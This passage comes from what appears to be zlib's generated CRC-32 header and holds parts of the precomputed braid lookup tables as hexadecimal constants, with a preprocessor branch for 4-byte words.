0xd2e5554a00000000, 0x9ecdc3e900000000, 0x0bb308d600000000, 0x479b9e7500000000, 0x214e9ea900000000, 0x6d66080a00000000, 0xf818c33500000000, 0xb430559600000000, 0x75b4b35600000000, 0x399c25f500000000, 0xace2eeca00000000, 0xe0ca786900000000, 0x861f78b500000000, 0xca37ee1600000000, 0x5f49252900000000, 0x1361b38a00000000, 0x388d32e700000000, 0x74a5a44400000000, 0xe1db6f7b00000000, 0xadf3f9d800000000, 0xcb26f90400000000, 0x870e6fa700000000, 0x1270a49800000000, 0x5e58323b00000000, 0x9fdcd4fb00000000, 0xd3f4425800000000, 0x468a896700000000, 0x0aa21fc400000000, 0x6c771f1800000000, 0x205f89bb00000000, 0xb521428400000000, 0xf909d42700000000, 0x762efede00000000, 0x3a06687d00000000, 0xaf78a34200000000, 0xe35035e100000000, 0x8585353d00000000, 0xc9ada39e00000000, 0x5cd368a100000000, 0x10fbfe0200000000, 0xd17f18c200000000, 0x9d578e6100000000, 0x0829455e00000000, 0x4401d3fd00000000, 0x22d4d32100000000, 0x6efc458200000000, 0xfb828ebd00000000, 0xb7aa181e00000000, 0xa4cbab9400000000, 0xe8e33d3700000000, 0x7d9df60800000000, 0x31b560ab00000000, 0x5760607700000000, 0x1b48f6d400000000, 0x8e363deb00000000, 0xc21eab4800000000, 0x039a4d8800000000, 0x4fb2db2b00000000, 0xdacc101400000000, 0x96e486b700000000, 0xf031866b00000000, 0xbc1910c800000000, 0x2967dbf700000000, 0x654f4d5400000000, 0xea6867ad00000000, 0xa640f10e00000000, 0x333e3a3100000000, 0x7f16ac9200000000, 0x19c3ac4e00000000, 0x55eb3aed00000000, 0xc095f1d200000000, 0x8cbd677100000000, 0x4d3981b100000000, 0x0111171200000000, 0x946fdc2d00000000, 0xd8474a8e00000000, 0xbe924a5200000000, 0xf2badcf100000000, 0x67c417ce00000000, 0x2bec816d00000000, 0x311c141500000000, 0x7d3482b600000000, 0xe84a498900000000, 0xa462df2a00000000, 0xc2b7dff600000000, 0x8e9f495500000000, 0x1be1826a00000000, 0x57c914c900000000, 0x964df20900000000, 0xda6564aa00000000, 0x4f1baf9500000000, 0x0333393600000000, 0x65e639ea00000000, 0x29ceaf4900000000, 0xbcb0647600000000, 0xf098f2d500000000, 0x7fbfd82c00000000, 0x33974e8f00000000, 0xa6e985b000000000, 0xeac1131300000000, 0x8c1413cf00000000, 0xc03c856c00000000, 0x55424e5300000000, 0x196ad8f000000000, 0xd8ee3e3000000000, 0x94c6a89300000000, 0x01b863ac00000000, 0x4d90f50f00000000, 0x2b45f5d300000000, 0x676d637000000000, 0xf213a84f00000000, 0xbe3b3eec00000000, 0xad5a8d6600000000, 0xe1721bc500000000, 0x740cd0fa00000000, 0x3824465900000000, 0x5ef1468500000000, 0x12d9d02600000000, 0x87a71b1900000000, 0xcb8f8dba00000000, 0x0a0b6b7a00000000, 0x4623fdd900000000, 0xd35d36e600000000, 0x9f75a04500000000, 0xf9a0a09900000000, 0xb588363a00000000, 0x20f6fd0500000000, 0x6cde6ba600000000, 0xe3f9415f00000000, 0xafd1d7fc00000000, 0x3aaf1cc300000000, 0x76878a6000000000, 0x10528abc00000000, 0x5c7a1c1f00000000, 0xc904d72000000000, 0x852c418300000000, 0x44a8a74300000000, 0x088031e000000000, 0x9dfefadf00000000, 0xd1d66c7c00000000, 0xb7036ca000000000, 0xfb2bfa0300000000, 0x6e55313c00000000, 0x227da79f00000000, 0x099126f200000000, 0x45b9b05100000000, 0xd0c77b6e00000000, 0x9cefedcd00000000, 0xfa3aed1100000000, 0xb6127bb200000000, 0x236cb08d00000000, 0x6f44262e00000000, 0xaec0c0ee00000000, 0xe2e8564d00000000, 0x77969d7200000000, 0x3bbe0bd100000000, 0x5d6b0b0d00000000, 0x11439dae00000000, 0x843d569100000000, 0xc815c03200000000, 0x4732eacb00000000, 0x0b1a7c6800000000, 0x9e64b75700000000, 0xd24c21f400000000, 0xb499212800000000, 0xf8b1b78b00000000, 0x6dcf7cb400000000, 0x21e7ea1700000000, 0xe0630cd700000000, 0xac4b9a7400000000, 0x3935514b00000000, 0x751dc7e800000000, 0x13c8c73400000000, 0x5fe0519700000000, 0xca9e9aa800000000, 0x86b60c0b00000000, 0x95d7bf8100000000, 0xd9ff292200000000, 0x4c81e21d00000000, 0x00a974be00000000, 0x667c746200000000, 0x2a54e2c100000000, 0xbf2a29fe00000000, 0xf302bf5d00000000, 0x3286599d00000000, 0x7eaecf3e00000000, 0xebd0040100000000, 0xa7f892a200000000, 0xc12d927e00000000, 0x8d0504dd00000000, 0x187bcfe200000000, 0x5453594100000000, 0xdb7473b800000000, 0x975ce51b00000000, 0x02222e2400000000, 0x4e0ab88700000000, 0x28dfb85b00000000, 0x64f72ef800000000, 0xf189e5c700000000, 0xbda1736400000000, 0x7c2595a400000000, 0x300d030700000000, 0xa573c83800000000, 0xe95b5e9b00000000, 0x8f8e5e4700000000, 0xc3a6c8e400000000, 0x56d803db00000000, 0x1af0957800000000}, {0x0000000000000000, 0x939bc97f00000000, 0x263793ff00000000, 0xb5ac5a8000000000, 0x0d68572400000000, 0x9ef39e5b00000000, 0x2b5fc4db00000000, 0xb8c40da400000000, 0x1ad0ae4800000000, 0x894b673700000000, 0x3ce73db700000000, 0xaf7cf4c800000000, 0x17b8f96c00000000, 0x8423301300000000, 0x318f6a9300000000, 0xa214a3ec00000000, 0x34a05d9100000000, 0xa73b94ee00000000, 0x1297ce6e00000000, 0x810c071100000000, 0x39c80ab500000000, 0xaa53c3ca00000000, 0x1fff994a00000000, 0x8c64503500000000, 0x2e70f3d900000000, 0xbdeb3aa600000000, 0x0847602600000000, 0x9bdca95900000000, 0x2318a4fd00000000, 0xb0836d8200000000, 0x052f370200000000, 0x96b4fe7d00000000, 0x2946caf900000000, 0xbadd038600000000, 0x0f71590600000000, 0x9cea907900000000, 0x242e9ddd00000000, 0xb7b554a200000000, 0x02190e2200000000, 0x9182c75d00000000, 0x339664b100000000, 0xa00dadce00000000, 0x15a1f74e00000000, 0x863a3e3100000000, 0x3efe339500000000, 0xad65faea00000000, 0x18c9a06a00000000, 0x8b52691500000000, 0x1de6976800000000, 0x8e7d5e1700000000, 0x3bd1049700000000, 0xa84acde800000000, 0x108ec04c00000000, 0x8315093300000000, 0x36b953b300000000, 0xa5229acc00000000, 0x0736392000000000, 0x94adf05f00000000, 0x2101aadf00000000, 0xb29a63a000000000, 0x0a5e6e0400000000, 0x99c5a77b00000000, 0x2c69fdfb00000000, 0xbff2348400000000, 0x138ae52800000000, 0x80112c5700000000, 0x35bd76d700000000, 0xa626bfa800000000, 0x1ee2b20c00000000, 0x8d797b7300000000, 0x38d521f300000000, 0xab4ee88c00000000, 0x095a4b6000000000, 0x9ac1821f00000000, 0x2f6dd89f00000000, 0xbcf611e000000000, 0x04321c4400000000, 0x97a9d53b00000000, 0x22058fbb00000000, 0xb19e46c400000000, 0x272ab8b900000000, 0xb4b171c600000000, 0x011d2b4600000000, 0x9286e23900000000, 0x2a42ef9d00000000, 0xb9d926e200000000, 0x0c757c6200000000, 0x9feeb51d00000000, 0x3dfa16f100000000, 0xae61df8e00000000, 0x1bcd850e00000000, 0x88564c7100000000, 0x309241d500000000, 0xa30988aa00000000, 0x16a5d22a00000000, 0x853e1b5500000000, 0x3acc2fd100000000, 0xa957e6ae00000000, 0x1cfbbc2e00000000, 0x8f60755100000000, 0x37a478f500000000, 0xa43fb18a00000000, 0x1193eb0a00000000, 0x8208227500000000, 0x201c819900000000, 0xb38748e600000000, 0x062b126600000000, 0x95b0db1900000000, 0x2d74d6bd00000000, 0xbeef1fc200000000, 0x0b43454200000000, 0x98d88c3d00000000, 0x0e6c724000000000, 0x9df7bb3f00000000, 0x285be1bf00000000, 0xbbc028c000000000, 0x0304256400000000, 0x909fec1b00000000, 0x2533b69b00000000, 0xb6a87fe400000000, 0x14bcdc0800000000, 0x8727157700000000, 0x328b4ff700000000, 0xa110868800000000, 0x19d48b2c00000000, 0x8a4f425300000000, 0x3fe318d300000000, 0xac78d1ac00000000, 0x2614cb5100000000, 0xb58f022e00000000, 0x002358ae00000000, 0x93b891d100000000, 0x2b7c9c7500000000, 0xb8e7550a00000000, 0x0d4b0f8a00000000, 0x9ed0c6f500000000, 0x3cc4651900000000, 0xaf5fac6600000000, 0x1af3f6e600000000, 0x89683f9900000000, 0x31ac323d00000000, 0xa237fb4200000000, 0x179ba1c200000000, 0x840068bd00000000, 0x12b496c000000000, 0x812f5fbf00000000, 0x3483053f00000000, 0xa718cc4000000000, 0x1fdcc1e400000000, 0x8c47089b00000000, 0x39eb521b00000000, 0xaa709b6400000000, 0x0864388800000000, 0x9bfff1f700000000, 0x2e53ab7700000000, 0xbdc8620800000000, 0x050c6fac00000000, 0x9697a6d300000000, 0x233bfc5300000000, 0xb0a0352c00000000, 0x0f5201a800000000, 0x9cc9c8d700000000, 0x2965925700000000, 0xbafe5b2800000000, 0x023a568c00000000, 0x91a19ff300000000, 0x240dc57300000000, 0xb7960c0c00000000, 0x1582afe000000000, 0x8619669f00000000, 0x33b53c1f00000000, 0xa02ef56000000000, 0x18eaf8c400000000, 0x8b7131bb00000000, 0x3edd6b3b00000000, 0xad46a24400000000, 0x3bf25c3900000000, 0xa869954600000000, 0x1dc5cfc600000000, 0x8e5e06b900000000, 0x369a0b1d00000000, 0xa501c26200000000, 0x10ad98e200000000, 0x8336519d00000000, 0x2122f27100000000, 0xb2b93b0e00000000, 0x0715618e00000000, 0x948ea8f100000000, 0x2c4aa55500000000, 0xbfd16c2a00000000, 0x0a7d36aa00000000, 0x99e6ffd500000000, 0x359e2e7900000000, 0xa605e70600000000, 0x13a9bd8600000000, 0x803274f900000000, 0x38f6795d00000000, 0xab6db02200000000, 0x1ec1eaa200000000, 0x8d5a23dd00000000, 0x2f4e803100000000, 0xbcd5494e00000000, 0x097913ce00000000, 0x9ae2dab100000000, 0x2226d71500000000, 0xb1bd1e6a00000000, 0x041144ea00000000, 0x978a8d9500000000, 0x013e73e800000000, 0x92a5ba9700000000, 0x2709e01700000000, 0xb492296800000000, 0x0c5624cc00000000, 0x9fcdedb300000000, 0x2a61b73300000000, 0xb9fa7e4c00000000, 0x1beedda000000000, 0x887514df00000000, 0x3dd94e5f00000000, 0xae42872000000000, 0x16868a8400000000, 0x851d43fb00000000, 0x30b1197b00000000, 0xa32ad00400000000, 0x1cd8e48000000000, 0x8f432dff00000000, 0x3aef777f00000000, 0xa974be0000000000, 0x11b0b3a400000000, 0x822b7adb00000000, 0x3787205b00000000, 0xa41ce92400000000, 0x06084ac800000000, 0x959383b700000000, 0x203fd93700000000, 0xb3a4104800000000, 0x0b601dec00000000, 0x98fbd49300000000, 0x2d578e1300000000, 0xbecc476c00000000, 0x2878b91100000000, 0xbbe3706e00000000, 0x0e4f2aee00000000, 0x9dd4e39100000000, 0x2510ee3500000000, 0xb68b274a00000000, 0x03277dca00000000, 0x90bcb4b500000000, 0x32a8175900000000, 0xa133de2600000000, 0x149f84a600000000, 0x87044dd900000000, 0x3fc0407d00000000, 0xac5b890200000000, 0x19f7d38200000000, 0x8a6c1afd00000000}, {0x0000000000000000, 0x650b796900000000, 0xca16f2d200000000, 0xaf1d8bbb00000000, 0xd52b957e00000000, 0xb020ec1700000000, 0x1f3d67ac00000000, 0x7a361ec500000000, 0xaa572afd00000000, 0xcf5c539400000000, 0x6041d82f00000000, 0x054aa14600000000, 0x7f7cbf8300000000, 0x1a77c6ea00000000, 0xb56a4d5100000000, 0xd061343800000000, 0x15a9252100000000, 0x70a25c4800000000, 0xdfbfd7f300000000, 0xbab4ae9a00000000, 0xc082b05f00000000, 0xa589c93600000000, 0x0a94428d00000000, 0x6f9f3be400000000, 0xbffe0fdc00000000, 0xdaf576b500000000, 0x75e8fd0e00000000, 0x10e3846700000000, 0x6ad59aa200000000, 0x0fdee3cb00000000, 0xa0c3687000000000, 0xc5c8111900000000, 0x2a524b4200000000, 0x4f59322b00000000, 0xe044b99000000000, 0x854fc0f900000000, 0xff79de3c00000000, 0x9a72a75500000000, 0x356f2cee00000000, 0x5064558700000000, 0x800561bf00000000, 0xe50e18d600000000, 0x4a13936d00000000, 0x2f18ea0400000000, 0x552ef4c100000000, 0x30258da800000000, 0x9f38061300000000, 0xfa337f7a00000000, 0x3ffb6e6300000000, 0x5af0170a00000000, 0xf5ed9cb100000000, 0x90e6e5d800000000, 0xead0fb1d00000000, 0x8fdb827400000000, 0x20c609cf00000000, 0x45cd70a600000000, 0x95ac449e00000000, 0xf0a73df700000000, 0x5fbab64c00000000, 0x3ab1cf2500000000, 0x4087d1e000000000, 0x258ca88900000000, 0x8a91233200000000, 0xef9a5a5b00000000, 0x54a4968400000000, 0x31afefed00000000, 0x9eb2645600000000, 0xfbb91d3f00000000, 0x818f03fa00000000, 0xe4847a9300000000, 0x4b99f12800000000, 0x2e92884100000000, 0xfef3bc7900000000, 0x9bf8c51000000000, 0x34e54eab00000000, 0x51ee37c200000000, 0x2bd8290700000000, 0x4ed3506e00000000, 0xe1cedbd500000000, 0x84c5a2bc00000000, 0x410db3a500000000, 0x2406cacc00000000, 0x8b1b417700000000, 0xee10381e00000000, 0x942626db00000000, 0xf12d5fb200000000, 0x5e30d40900000000, 0x3b3bad6000000000, 0xeb5a995800000000, 0x8e51e03100000000, 0x214c6b8a00000000, 0x444712e300000000, 0x3e710c2600000000, 0x5b7a754f00000000, 0xf467fef400000000, 0x916c879d00000000, 0x7ef6ddc600000000, 0x1bfda4af00000000, 0xb4e02f1400000000, 0xd1eb567d00000000, 0xabdd48b800000000, 0xced631d100000000, 0x61cbba6a00000000, 0x04c0c30300000000, 0xd4a1f73b00000000, 0xb1aa8e5200000000, 0x1eb705e900000000, 0x7bbc7c8000000000, 0x018a624500000000, 0x64811b2c00000000, 0xcb9c909700000000, 0xae97e9fe00000000, 0x6b5ff8e700000000, 0x0e54818e00000000, 0xa1490a3500000000, 0xc442735c00000000, 0xbe746d9900000000, 0xdb7f14f000000000, 0x74629f4b00000000, 0x1169e62200000000, 0xc108d21a00000000, 0xa403ab7300000000, 0x0b1e20c800000000, 0x6e1559a100000000, 0x1423476400000000, 0x71283e0d00000000, 0xde35b5b600000000, 0xbb3eccdf00000000, 0xe94e5cd200000000, 0x8c4525bb00000000, 0x2358ae0000000000, 0x4653d76900000000, 0x3c65c9ac00000000, 0x596eb0c500000000, 0xf6733b7e00000000, 0x9378421700000000, 0x4319762f00000000, 0x26120f4600000000, 0x890f84fd00000000, 0xec04fd9400000000, 0x9632e35100000000, 0xf3399a3800000000, 0x5c24118300000000, 0x392f68ea00000000, 0xfce779f300000000, 0x99ec009a00000000, 0x36f18b2100000000, 0x53faf24800000000, 0x29ccec8d00000000, 0x4cc795e400000000, 0xe3da1e5f00000000, 0x86d1673600000000, 0x56b0530e00000000, 0x33bb2a6700000000, 0x9ca6a1dc00000000, 0xf9add8b500000000, 0x839bc67000000000, 0xe690bf1900000000, 0x498d34a200000000, 0x2c864dcb00000000, 0xc31c179000000000, 0xa6176ef900000000, 0x090ae54200000000, 0x6c019c2b00000000, 0x163782ee00000000, 0x733cfb8700000000, 0xdc21703c00000000, 0xb92a095500000000, 0x694b3d6d00000000, 0x0c40440400000000, 0xa35dcfbf00000000, 0xc656b6d600000000, 0xbc60a81300000000, 0xd96bd17a00000000, 0x76765ac100000000, 0x137d23a800000000, 0xd6b532b100000000, 0xb3be4bd800000000, 0x1ca3c06300000000, 0x79a8b90a00000000, 0x039ea7cf00000000, 0x6695dea600000000, 0xc988551d00000000, 0xac832c7400000000, 0x7ce2184c00000000, 0x19e9612500000000, 0xb6f4ea9e00000000, 0xd3ff93f700000000, 0xa9c98d3200000000, 0xccc2f45b00000000, 0x63df7fe000000000, 0x06d4068900000000, 0xbdeaca5600000000, 0xd8e1b33f00000000, 0x77fc388400000000, 0x12f741ed00000000, 0x68c15f2800000000, 0x0dca264100000000, 0xa2d7adfa00000000, 0xc7dcd49300000000, 0x17bde0ab00000000, 0x72b699c200000000, 0xddab127900000000, 0xb8a06b1000000000, 0xc29675d500000000, 0xa79d0cbc00000000, 0x0880870700000000, 0x6d8bfe6e00000000, 0xa843ef7700000000, 0xcd48961e00000000, 0x62551da500000000, 0x075e64cc00000000, 0x7d687a0900000000, 0x1863036000000000, 0xb77e88db00000000, 0xd275f1b200000000, 0x0214c58a00000000, 0x671fbce300000000, 0xc802375800000000, 0xad094e3100000000, 0xd73f50f400000000, 0xb234299d00000000, 0x1d29a22600000000, 0x7822db4f00000000, 0x97b8811400000000, 0xf2b3f87d00000000, 0x5dae73c600000000, 0x38a50aaf00000000, 0x4293146a00000000, 0x27986d0300000000, 0x8885e6b800000000, 0xed8e9fd100000000, 0x3defabe900000000, 0x58e4d28000000000, 0xf7f9593b00000000, 0x92f2205200000000, 0xe8c43e9700000000, 0x8dcf47fe00000000, 0x22d2cc4500000000, 0x47d9b52c00000000, 0x8211a43500000000, 0xe71add5c00000000, 0x480756e700000000, 0x2d0c2f8e00000000, 0x573a314b00000000, 0x3231482200000000, 0x9d2cc39900000000, 0xf827baf000000000, 0x28468ec800000000, 0x4d4df7a100000000, 0xe2507c1a00000000, 0x875b057300000000, 0xfd6d1bb600000000, 0x986662df00000000, 0x377be96400000000, 0x5270900d00000000}, {0x0000000000000000, 0xdcecb13d00000000, 0xb8d9637b00000000, 0x6435d24600000000, 0x70b3c7f600000000, 0xac5f76cb00000000, 0xc86aa48d00000000, 0x148615b000000000, 0xa160fe3600000000, 0x7d8c4f0b00000000, 0x19b99d4d00000000, 0xc5552c7000000000, 0xd1d339c000000000, 0x0d3f88fd00000000, 0x690a5abb00000000, 0xb5e6eb8600000000, 0x42c1fc6d00000000, 0x9e2d4d5000000000, 0xfa189f1600000000, 0x26f42e2b00000000, 0x32723b9b00000000, 0xee9e8aa600000000, 0x8aab58e000000000, 0x5647e9dd00000000, 0xe3a1025b00000000, 0x3f4db36600000000, 0x5b78612000000000, 0x8794d01d00000000, 0x9312c5ad00000000, 0x4ffe749000000000, 0x2bcba6d600000000, 0xf72717eb00000000, 0x8482f9db00000000, 0x586e48e600000000, 0x3c5b9aa000000000, 0xe0b72b9d00000000, 0xf4313e2d00000000, 0x28dd8f1000000000, 0x4ce85d5600000000, 0x9004ec6b00000000, 0x25e207ed00000000, 0xf90eb6d000000000, 0x9d3b649600000000, 0x41d7d5ab00000000, 0x5551c01b00000000, 0x89bd712600000000, 0xed88a36000000000, 0x3164125d00000000, 0xc64305b600000000, 0x1aafb48b00000000, 0x7e9a66cd00000000, 0xa276d7f000000000, 0xb6f0c24000000000, 0x6a1c737d00000000, 0x0e29a13b00000000, 0xd2c5100600000000, 0x6723fb8000000000, 0xbbcf4abd00000000, 0xdffa98fb00000000, 0x031629c600000000, 0x17903c7600000000, 0xcb7c8d4b00000000, 0xaf495f0d00000000, 0x73a5ee3000000000, 0x4903826c00000000, 0x95ef335100000000, 0xf1dae11700000000, 0x2d36502a00000000, 0x39b0459a00000000, 0xe55cf4a700000000, 0x816926e100000000, 0x5d8597dc00000000, 0xe8637c5a00000000, 0x348fcd6700000000, 0x50ba1f2100000000, 0x8c56ae1c00000000, 0x98d0bbac00000000, 0x443c0a9100000000, 0x2009d8d700000000, 0xfce569ea00000000, 0x0bc27e0100000000, 0xd72ecf3c00000000, 0xb31b1d7a00000000, 0x6ff7ac4700000000, 0x7b71b9f700000000, 0xa79d08ca00000000, 0xc3a8da8c00000000, 0x1f446bb100000000, 0xaaa2803700000000, 0x764e310a00000000, 0x127be34c00000000, 0xce97527100000000, 0xda1147c100000000, 0x06fdf6fc00000000, 0x62c824ba00000000, 0xbe24958700000000, 0xcd817bb700000000, 0x116dca8a00000000, 0x755818cc00000000, 0xa9b4a9f100000000, 0xbd32bc4100000000, 0x61de0d7c00000000, 0x05ebdf3a00000000, 0xd9076e0700000000, 0x6ce1858100000000, 0xb00d34bc00000000, 0xd438e6fa00000000, 0x08d457c700000000, 0x1c52427700000000, 0xc0bef34a00000000, 0xa48b210c00000000, 0x7867903100000000, 0x8f4087da00000000, 0x53ac36e700000000, 0x3799e4a100000000, 0xeb75559c00000000, 0xfff3402c00000000, 0x231ff11100000000, 0x472a235700000000, 0x9bc6926a00000000, 0x2e2079ec00000000, 0xf2ccc8d100000000, 0x96f91a9700000000, 0x4a15abaa00000000, 0x5e93be1a00000000, 0x827f0f2700000000, 0xe64add6100000000, 0x3aa66c5c00000000, 0x920604d900000000, 0x4eeab5e400000000, 0x2adf67a200000000, 0xf633d69f00000000, 0xe2b5c32f00000000, 0x3e59721200000000, 0x5a6ca05400000000, 0x8680116900000000, 0x3366faef00000000, 0xef8a4bd200000000, 0x8bbf999400000000, 0x575328a900000000, 0x43d53d1900000000, 0x9f398c2400000000, 0xfb0c5e6200000000, 0x27e0ef5f00000000, 0xd0c7f8b400000000, 0x0c2b498900000000, 0x681e9bcf00000000, 0xb4f22af200000000, 0xa0743f4200000000, 0x7c988e7f00000000, 0x18ad5c3900000000, 0xc441ed0400000000, 0x71a7068200000000, 0xad4bb7bf00000000, 0xc97e65f900000000, 0x1592d4c400000000, 0x0114c17400000000, 0xddf8704900000000, 0xb9cda20f00000000, 0x6521133200000000, 0x1684fd0200000000, 0xca684c3f00000000, 0xae5d9e7900000000, 0x72b12f4400000000, 0x66373af400000000, 0xbadb8bc900000000, 0xdeee598f00000000, 0x0202e8b200000000, 0xb7e4033400000000, 0x6b08b20900000000, 0x0f3d604f00000000, 0xd3d1d17200000000, 0xc757c4c200000000, 0x1bbb75ff00000000, 0x7f8ea7b900000000, 0xa362168400000000, 0x5445016f00000000, 0x88a9b05200000000, 0xec9c621400000000, 0x3070d32900000000, 0x24f6c69900000000, 0xf81a77a400000000, 0x9c2fa5e200000000, 0x40c314df00000000, 0xf525ff5900000000, 0x29c94e6400000000, 0x4dfc9c2200000000, 0x91102d1f00000000, 0x859638af00000000, 0x597a899200000000, 0x3d4f5bd400000000, 0xe1a3eae900000000, 0xdb0586b500000000, 0x07e9378800000000, 0x63dce5ce00000000, 0xbf3054f300000000, 0xabb6414300000000, 0x775af07e00000000, 0x136f223800000000, 0xcf83930500000000, 0x7a65788300000000, 0xa689c9be00000000, 0xc2bc1bf800000000, 0x1e50aac500000000, 0x0ad6bf7500000000, 0xd63a0e4800000000, 0xb20fdc0e00000000, 0x6ee36d3300000000, 0x99c47ad800000000, 0x4528cbe500000000, 0x211d19a300000000, 0xfdf1a89e00000000, 0xe977bd2e00000000, 0x359b0c1300000000, 0x51aede5500000000, 0x8d426f6800000000, 0x38a484ee00000000, 0xe44835d300000000, 0x807de79500000000, 0x5c9156a800000000, 0x4817431800000000, 0x94fbf22500000000, 0xf0ce206300000000, 0x2c22915e00000000, 0x5f877f6e00000000, 0x836bce5300000000, 0xe75e1c1500000000, 0x3bb2ad2800000000, 0x2f34b89800000000, 0xf3d809a500000000, 0x97eddbe300000000, 0x4b016ade00000000, 0xfee7815800000000, 0x220b306500000000, 0x463ee22300000000, 0x9ad2531e00000000, 0x8e5446ae00000000, 0x52b8f79300000000, 0x368d25d500000000, 0xea6194e800000000, 0x1d46830300000000, 0xc1aa323e00000000, 0xa59fe07800000000, 0x7973514500000000, 0x6df544f500000000, 0xb119f5c800000000, 0xd52c278e00000000, 0x09c096b300000000, 0xbc267d3500000000, 0x60cacc0800000000, 0x04ff1e4e00000000, 0xd813af7300000000, 0xcc95bac300000000, 0x10790bfe00000000, 0x744cd9b800000000, 0xa8a0688500000000}}; #else /* W == 4 */ local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x81256527, 0xd93bcc0f, 0x581ea928, 0x69069e5f, 0xe823fb78, 0xb03d5250, 0x31183777, 0xd20d3cbe, 0x53285999, 0x0b36f0b1, 0x8a139596, 0xbb0ba2e1, 0x3a2ec7c6, 0x62306eee, 0xe3150bc9, 0x7f6b7f3d, 0xfe4e1a1a, 0xa650b332, 0x2775d615, 0x166de162, 0x97488445, 0xcf562d6d, 0x4e73484a, 0xad664383, 0x2c4326a4, 0x745d8f8c, 0xf578eaab, 0xc460dddc, 0x4545b8fb, 0x1d5b11d3, 0x9c7e74f4, 0xfed6fe7a, 0x7ff39b5d, 0x27ed3275, 0xa6c85752, 0x97d06025, 0x16f50502, 0x4eebac2a, 0xcfcec90d, 0x2cdbc2c4, 0xadfea7e3, 0xf5e00ecb, 0x74c56bec, 0x45dd5c9b, 0xc4f839bc, 0x9ce69094, 0x1dc3f5b3, 0x81bd8147, 0x0098e460, 0x58864d48, 0xd9a3286f, 0xe8bb1f18, 0x699e7a3f, 0x3180d317, 0xb0a5b630, 0x53b0bdf9, 0xd295d8de, 0x8a8b71f6, 0x0bae14d1, 0x3ab623a6, 0xbb934681, 0xe38defa9, 0x62a88a8e, 0x26dcfab5, 0xa7f99f92, 0xffe736ba, 0x7ec2539d, 0x4fda64ea, 0xceff01cd, 0x96e1a8e5, 0x17c4cdc2, 0xf4d1c60b, 0x75f4a32c, 0x2dea0a04, 0xaccf6f23, 0x9dd75854, 0x1cf23d73, 0x44ec945b, 0xc5c9f17c, 0x59b78588, 0xd892e0af, 0x808c4987, 0x01a92ca0, 0x30b11bd7, 0xb1947ef0, 0xe98ad7d8, 0x68afb2ff, 0x8bbab936, 0x0a9fdc11, 0x52817539, 0xd3a4101e, 0xe2bc2769, 0x6399424e, 0x3b87eb66, 0xbaa28e41, 0xd80a04cf, 0x592f61e8, 0x0131c8c0, 0x8014ade7, 0xb10c9a90, 0x3029ffb7, 0x6837569f, 0xe91233b8, 0x0a073871, 0x8b225d56, 0xd33cf47e, 0x52199159, 0x6301a62e, 0xe224c309, 0xba3a6a21, 0x3b1f0f06, 0xa7617bf2, 0x26441ed5, 0x7e5ab7fd, 0xff7fd2da, 0xce67e5ad, 0x4f42808a, 0x175c29a2, 0x96794c85, 0x756c474c, 0xf449226b, 0xac578b43, 0x2d72ee64, 0x1c6ad913, 0x9d4fbc34, 0xc551151c, 0x4474703b, 0x4db9f56a, 0xcc9c904d, 0x94823965, 0x15a75c42, 0x24bf6b35, 0xa59a0e12, 0xfd84a73a, 0x7ca1c21d, 0x9fb4c9d4, 0x1e91acf3, 0x468f05db, 0xc7aa60fc, 0xf6b2578b, 0x779732ac, 0x2f899b84, 0xaeacfea3, 0x32d28a57, 0xb3f7ef70, 0xebe94658, 0x6acc237f, 0x5bd41408, 0xdaf1712f, 0x82efd807, 0x03cabd20, 0xe0dfb6e9, 0x61fad3ce, 0x39e47ae6, 0xb8c11fc1, 0x89d928b6, 0x08fc4d91, 0x50e2e4b9, 0xd1c7819e, 0xb36f0b10, 0x324a6e37, 0x6a54c71f, 0xeb71a238, 0xda69954f, 0x5b4cf068, 0x03525940, 0x82773c67, 0x616237ae, 0xe0475289, 0xb859fba1, 0x397c9e86, 0x0864a9f1, 0x8941ccd6, 0xd15f65fe, 0x507a00d9, 0xcc04742d, 0x4d21110a, 0x153fb822, 0x941add05, 0xa502ea72, 0x24278f55, 0x7c39267d, 0xfd1c435a, 0x1e094893, 0x9f2c2db4, 0xc732849c, 0x4617e1bb, 0x770fd6cc, 0xf62ab3eb, 0xae341ac3, 0x2f117fe4, 0x6b650fdf, 0xea406af8, 0xb25ec3d0, 0x337ba6f7, 0x02639180, 0x8346f4a7, 0xdb585d8f, 0x5a7d38a8, 0xb9683361, 0x384d5646, 0x6053ff6e, 0xe1769a49, 0xd06ead3e, 0x514bc819, 0x09556131, 0x88700416, 0x140e70e2, 0x952b15c5, 0xcd35bced, 0x4c10d9ca, 0x7d08eebd, 0xfc2d8b9a, 0xa43322b2, 0x25164795, 0xc6034c5c, 0x4726297b, 0x1f388053, 0x9e1de574, 0xaf05d203, 0x2e20b724, 0x763e1e0c, 0xf71b7b2b, 0x95b3f1a5, 0x14969482, 0x4c883daa, 0xcdad588d, 0xfcb56ffa, 0x7d900add, 0x258ea3f5, 0xa4abc6d2, 0x47becd1b, 0xc69ba83c, 0x9e850114, 0x1fa06433, 0x2eb85344, 0xaf9d3663, 0xf7839f4b, 0x76a6fa6c, 0xead88e98, 0x6bfdebbf, 0x33e34297, 0xb2c627b0, 0x83de10c7, 0x02fb75e0, 0x5ae5dcc8, 0xdbc0b9ef, 0x38d5b226, 0xb9f0d701, 0xe1ee7e29, 0x60cb1b0e, 0x51d32c79, 0xd0f6495e, 0x88e8e076, 0x09cd8551}, {0x00000000, 0x9b73ead4, 0xed96d3e9, 0x76e5393d, 0x005ca193, 0x9b2f4b47, 0xedca727a, 0x76b998ae, 0x00b94326, 0x9bcaa9f2, 0xed2f90cf, 0x765c7a1b, 0x00e5e2b5, 0x9b960861, 0xed73315c, 0x7600db88, 0x0172864c, 0x9a016c98, 0xece455a5, 0x7797bf71, 0x012e27df, 0x9a5dcd0b, 0xecb8f436, 0x77cb1ee2, 0x01cbc56a, 0x9ab82fbe, 0xec5d1683, 0x772efc57, 0x019764f9, 0x9ae48e2d, 0xec01b710, 0x77725dc4, 0x02e50c98, 0x9996e64c, 0xef73df71, 0x740035a5, 0x02b9ad0b, 0x99ca47df, 0xef2f7ee2, 0x745c9436, 0x025c4fbe, 0x992fa56a, 0xefca9c57, 0x74b97683, 0x0200ee2d, 0x997304f9, 0xef963dc4, 0x74e5d710, 0x03978ad4, 0x98e46000, 0xee01593d, 0x7572b3e9, 0x03cb2b47, 0x98b8c193, 0xee5df8ae, 0x752e127a, 0x032ec9f2, 0x985d2326, 0xeeb81a1b, 0x75cbf0cf, 0x03726861, 0x980182b5, 0xeee4bb88, 0x7597515c, 0x05ca1930, 0x9eb9f3e4, 0xe85ccad9, 0x732f200d, 0x0596b8a3, 0x9ee55277, 0xe8006b4a, 0x7373819e, 0x05735a16, 0x9e00b0c2, 0xe8e589ff, 0x7396632b, 